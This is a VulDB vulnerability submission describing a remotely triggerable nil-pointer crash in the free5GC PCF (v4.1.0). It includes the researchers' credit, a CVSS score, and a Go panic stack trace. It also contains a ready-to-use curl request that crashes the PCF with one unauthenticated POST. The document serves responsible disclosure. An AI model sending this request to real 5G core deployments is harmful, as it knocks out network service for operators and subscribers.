Submit #741194: free5gc PCF v4.1.0 Denial of Serviceinfo

Titlefree5gc PCF v4.1.0 Denial of Service
Description## Bug Decription The free5GC PCF can be crashed remotely by an HTTP CreateSmPolicy request that leads to a downstream OpenAPI call returning 404 Not Found. After logging the OpenAPI error, PCF continues executing the request handler and hits a nil pointer dereference in Processor.HandleCreateSmPolicyRequest (internal/sbi/processor/smpolicy.go, around line 82), causing a panic and terminating the PCF process. This results in a denial of service. ## Credit Ziyu Lin, Xiaofeng Wang, Wei Dong (Nanyang Technological University) ## CVSS3.1 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H ## To Reproduce Steps to reproduce the behavior: curl -sS -X POST http://x.x.x.x:8000/npcf-smpolicycontrol/v1/sm-policies \ -H 'Content-Type: application/json' \ -d '{ "supi":"imsi-208930000000003", "pduSessionId":1, "dnn":"internet-bad", "sliceInfo":{"sst":1,"sd":"010203"}, "servingNetwork":{"mcc":"208","mnc":"93"}, "accessType":"3GPP_ACCESS", "notificationUri":"http://smf.free5gc.org:8000/npcf-smpolicycontrol/v1/notify" }' ## Expected Behavior PCF should handle downstream OpenAPI failures (e.g., 404 Not Found) gracefully: return an appropriate HTTP error response (e.g., 4xx/5xx with ProblemDetails), and stop further processing of the request (abort/return from handler). PCF should not panic or terminate. ## Screenshots <img width="1035" height="574" alt="Image" src="https://github.com/user-attachments/assets/d2864ae5-71dd-40f9-b510-e1148e6a3e41" /> ## Environment - free5GC Version: v4.1.0 - OS: Ubuntu 22.04 Server - Kernel version: [e.g. 5.15.0-0-generic] - go version: go version go1.24.9 linux/amd64 ### Log File ``` 026-01-15T02:55:56.144398346Z [INFO][PCF][SMpolicy] Handle CreateSmPolicy 2026-01-15T02:55:56.150987133Z [ERRO][PCF][Consumer] openapi error: 404, Not Found 2026-01-15T02:55:56.151135343Z [ERRO][PCF][GIN] panic: runtime error: invalid memory address or nil pointer dereference goroutine 1775 [running]: runtime/debug.Stack() /usr/local/go/src/runtime/debug/stack.go:26 +0x5e github.com/free5gc/util/logger.NewGinWithLogrus.ginRecover.func2.1() /go/pkg/mod/github.com/free5gc/[email protected]/logger/logger.go:298 +0x117 panic({0xf51420?, 0x199fd90?}) /usr/local/go/src/runtime/panic.go:792 +0x132 github.com/free5gc/pcf/internal/sbi/processor.(*Processor).HandleCreateSmPolicyRequest(_, _, {0x0, 0x0, {0x0, 0x0}, {0xc000560348, 0x14}, 0x0, {0x0, ...}, ...}) /go/src/free5gc/NFs/pcf/internal/sbi/processor/smpolicy.go:82 +0x562 github.com/free5gc/pcf/internal/sbi.(*Server).HTTPCreateSMPolicy(0xc00024f3c0, 0xc0005ac700) /go/src/free5gc/NFs/pcf/internal/sbi/api_smpolicy.go:86 +0x405 github.com/gin-gonic/gin.(*Context).Next(0xc0005ac700) /go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:185 +0x2b github.com/free5gc/pcf/internal/sbi.NewServer.InboundMetrics.func5(0xc0005ac700) /go/pkg/mod/github.com/free5gc/[email protected]/metrics/middleware.go:15 +0x45 github.com/gin-gonic/gin.(*Context).Next(0xc0005ac700) /go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:185 +0x2b github.com/free5gc/util/logger.NewGinWithLogrus.ginRecover.func2(0x7f3f8c7042a8?) /go/pkg/mod/github.com/free5gc/[email protected]/logger/logger.go:330 +0x48 github.com/gin-gonic/gin.(*Context).Next(0xc0005ac700) /go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:185 +0x2b github.com/free5gc/util/logger.NewGinWithLogrus.ginToLogrus.func1(0xc0005ac700) /go/pkg/mod/github.com/free5gc/[email protected]/logger/logger.go:256 +0x65 github.com/gin-gonic/gin.(*Context).Next(...) /go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:185 github.com/gin-gonic/gin.(*Engine).handleHTTPRequest(0xc0001eb040, 0xc0005ac700) /go/pkg/mod/github.com/gin-gonic/[email protected]/gin.go:633 +0x872 github.com/gin-gonic/gin.(*Engine).ServeHTTP(0xc0001eb040, {0x129b4a0, 0xc000000460}, 0xc0004a7180) /go/pkg/mod/github.com/gin-gonic/[email protected]/gin.go:589 +0x1aa golang.org/x/net/http2/h2c.h2cHandler.ServeHTTP({{0x1294820?, 0xc0001eb040?}, 0xc000252c40?}, {0x129b4a0, 0xc000000460}, 0xc0004a7180) /go/pkg/mod/golang.org/x/[email protected]/http2/h2c/h2c.go:125 +0x673 net/http.serverHandler.ServeHTTP({0x1298488?}, {0x129b4a0?, 0xc000000460?}, 0x1?) /usr/local/go/src/net/http/server.go:3301 +0x8e net/http.(*conn).serve(0xc0000fee10, {0x129c5f8, 0xc000570e40}) /usr/local/go/src/net/http/server.go:2102 +0x625 created by net/http.(*Server).Serve in goroutine 35 /usr/local/go/src/net/http/server.go:3454 +0x485 ```
Source⚠️ https://github.com/free5gc/free5gc/issues/803
User
 ZiyuLin (UID 93568)
Submission01/17/2026 03:16 AM (2 months ago)
Moderation02/01/2026 08:50 AM (15 days later)
StatusAccepted
VulDB entry343638 [Free5GC pcf up to 1.4.1 smpolicy.go HandleCreateSmPolicyRequest null pointer dereference]
Points20

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!